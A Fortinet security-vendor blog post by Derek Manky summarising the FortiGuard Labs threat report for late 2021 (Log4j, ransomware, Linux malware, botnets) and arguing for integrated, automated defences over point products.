The high-resolution threat intelligence found in the latest semiannual FortiGuard Labs Global Threat Landscape Report can be a great help to organizations and IT teams. The report provides deep visibility into the latest cyberattacks and if the data is used promptly, it will serve as a guide on how best to fortify IT security.
With many charts and graphics that illustrate the techniques, tactics, and processes (TTPs) attackers use, the report data gives organizations the ability to pinpoint current threats. The findings are drawn from a vast array of network sensors that daily documents billions of threats in live production environments worldwide.
Highlighted in the report are some of the top threats from the second half of 2021:
- Log4j: Despite emerging in the second week of December, exploitation activity escalated quickly enough to make it the most prevalent IPS detection of the entire half of 2021.
- Threat actors are moving Linux-based malware closer and closer to the top shelf in their collection of nefarious tools.
- The sophistication, aggressiveness, and impact of the ransomware threat charges on, not slowing down.
- Botnet trends show a more sophisticated evolution of attack methods
- Malware trends show cybercriminals maximizing “remote everything”
Threat intelligence is like storm forecasting. It provides organizations with data captured in the real-world and makes them aware of the types of threats that are on the horizon, when to expect them, how they work, and how much havoc they may cause.
When organizations have this kind of visibility, they can better defend against cyberattacks. And just like when a storm is threatening, there’s only a short window of time for proactive tasks. Cyberthreats require the same timely preparation that hurricanes or tornados require. In the past, IT security professionals may have had months to prepared for a threat, but today’s SOCs often have only 48 hours or even much less.
Speed, Speed, Speed…
A key learning from recent threat research is that threat actors are now executing attacks at speeds never witnessed before. The bad guys are accelerating through the attack phases, giving defenders little to no time to respond. It’s alarming when the data show an increase in pace by the attackers, because speed kills -- especially, as the attack surface keeps growing.
This acceleration in attacks is forcing organizations to adapt and adopt AI-powered prevention and detection strategies. Cyber defenses that rely on point products and philosophies of “Just stop all weaponization of threats” or “Just stop execution of effects” are no longer enough. The issue is that there are too many different techniques that the attackers have available in their playbook.
The Problem with Point Products
Point products are problematic because they don’t “communicate” with other security solutions, and this lack of integration equals a lack of total visibility. Another issue with point products is the manual elements that the SOCs need to employ. If a suspicious event is found on Point Product A, it may need to be cross-referenced with Point Product B or Point Product C or cross-verified with a SIEM. This manual operational legwork needs to be done quickly to keep up with the how fast the threat attacks is moving.
Clearly, having integration and automation capabilities as part of an analysis process are vital for strong cybersecurity. Taking the manual work out of the process, speeds the defensive response and permits the analysts to stay on task and focus on defending against the attack -- rather than spending time checking policies or uploading logs or other distractions.
No Let Up in Sight
IT security professionals have always expressed the need for speed in defending against attacks. That message is only going to get louder and continue to be echoed as “everything is happening faster” in regards to cyberattacks. Also, the multitude of techniques being used by cybercriminals in their attacks, along with the increased speed of execution and sophisticated of the threats are challenging everyone on an enterprise’s IT security team.
If an organization hasn't figured how to fully support and partner across the CISO and IT organizations to improve, fortify, and accelerate intrusion responses, it could find itself in the news as the latest victim.
It’s been said before, but it bears repeating: The time to get visibility into the current threat landscape and your cybersecurity posture is now. This isn’t a rogue wave or a one-off. It’s going to be happening again and again. Be ready.
Learn more about Fortinet’s FortiGuard security services portfolio.
As chief security strategist and VP of threat intelligence at Fortinet’s FortiGuard Labs, Derek Manky formulates security strategy with more than 17 years of cybersecurity experience. His ultimate goal is to make a positive impact towards the global war on cybercrime. Manky provides thought leadership to the industry and has presented research and strategy worldwide at premier security conferences. As a cybersecurity expert, his work has included meetings with leading political figures and key policy stakeholders, including law enforcement, who help define the future of cyber security. He is actively involved with several global threat intelligence initiatives, including NATO NICP, INTERPOL Expert Working Group, the Cyber Threat Alliance (CTA) working committee and FIRST, all in an effort to shape the future of actionable threat intelligence and proactive security strategy.